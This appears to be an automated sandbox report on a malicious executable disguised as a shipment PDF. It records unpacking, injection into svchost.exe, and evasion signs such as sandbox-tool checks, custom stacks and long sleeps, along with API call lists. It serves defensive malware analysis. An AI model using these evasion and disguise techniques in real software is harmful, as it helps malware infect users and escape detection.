Source:	Binary string: wntdll.pdb source: Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1705677236.0000000003870000.00000004.00001000.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1706006327.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1720487157.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1719286949.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000003.00000002.2937954887.00000000006C1000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000003.00000002.2937954887.00000000006C1000.00000020.00000001.01000000.00000005.sdmp

Source: Shipment Delivery No DE0093002-PDF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Shipment Delivery No DE0093002-PDF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Shipment Delivery No DE0093002-PDF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Shipment Delivery No DE0093002-PDF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Shipment Delivery No DE0093002-PDF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipment Delivery No DE0093002-PDF.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Shipment Delivery No DE0093002-PDF.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7536, type: MEMORYSTR

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_000C4B37 LoadLibraryA,GetProcAddress,

0_2_000C4B37

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012848F push FFFFFF8Bh; iretd	0_2_00128491
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000CC4C6 push A3000CBAh; retn 000Ch	0_2_000CC50D
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000EE70F push edi; ret	0_2_000EE711
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000EE828 push esi; ret	0_2_000EE82A
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000E8945 push ecx; ret	0_2_000E8958
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000EEA03 push esi; ret	0_2_000EEA05
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000EEAEC push edi; ret	0_2_000EEAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00402AC0 push eax; ret	3_2_00402AD4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00402AC0 push eax; ret	3_2_00402AFC

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_006C3360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

3_2_006C3360

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_000C48D7
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_00145376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00145376

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_000E3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_000E3187

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	API/Special instruction interceptor: Address: D17114
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	API/Special instruction interceptor: Address: 143615C

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1709925689.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1711292477.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1707156126.0000000001423000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000002.1721856918.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1709298164.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1720723411.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1709550882.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1709741664.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1707088294.0000000001413000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXEEJ
Source: Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1698154533.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1699060103.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1698810361.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000000.00000002.1708259063.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1698959934.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1697538007.0000000000D04000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1698632243.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1706712759.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1699923905.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-102050

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

API coverage: 4.7 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 7540

Thread sleep time: -840000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0012445A
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012C6D1 FindFirstFileW,FindClose,	0_2_0012C6D1
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0012C75C
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0012EF95
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0012F0F2
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0012F3F3
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_001237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_001237EF
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_00123B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00123B12
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0012BCBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	3_2_00403D74

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_000C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_000C49A0

Source: C:\Windows\SysWOW64\svchost.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: svchost.exe, 00000003.00000002.2938243378.0000000002A00000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_00133F09 BlockInput,

0_2_00133F09

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_000C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_000C3B3A

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_000F5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_000F5A7C

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_000C4B37 LoadLibraryA,GetProcAddress,

0_2_000C4B37

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_00D173E0 mov eax, dword ptr fs:[00000030h]	0_2_00D173E0
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_00D17380 mov eax, dword ptr fs:[00000030h]	0_2_00D17380
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_00D15D80 mov eax, dword ptr fs:[00000030h]	0_2_00D15D80
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 2_2_014363C8 mov eax, dword ptr fs:[00000030h]	2_2_014363C8
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 2_2_01434DC8 mov eax, dword ptr fs:[00000030h]	2_2_01434DC8
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 2_2_01436428 mov eax, dword ptr fs:[00000030h]	2_2_01436428
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]	3_2_0040317B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C3060 mov eax, dword ptr fs:[00000030h]	3_2_006C3060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C3060 mov eax, dword ptr fs:[00000030h]	3_2_006C3060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C3060 mov eax, dword ptr fs:[00000030h]	3_2_006C3060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C3060 mov eax, dword ptr fs:[00000030h]	3_2_006C3060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C4410 mov eax, dword ptr fs:[00000030h]	3_2_006C4410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C4410 mov eax, dword ptr fs:[00000030h]	3_2_006C4410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C3540 mov eax, dword ptr fs:[00000030h]	3_2_006C3540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C3540 mov eax, dword ptr fs:[00000030h]	3_2_006C3540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C3540 mov eax, dword ptr fs:[00000030h]	3_2_006C3540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C4610 mov eax, dword ptr fs:[00000030h]	3_2_006C4610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C4610 mov eax, dword ptr fs:[00000030h]	3_2_006C4610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C4610 mov eax, dword ptr fs:[00000030h]	3_2_006C4610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C4610 mov eax, dword ptr fs:[00000030h]	3_2_006C4610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C56A0 mov eax, dword ptr fs:[00000030h]	3_2_006C56A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C56A0 mov ecx, dword ptr fs:[00000030h]	3_2_006C56A0

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_001180A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_001180A9

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000EA124 SetUnhandledExceptionFilter,	0_2_000EA124
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_000EA155
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C5848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_006C5848
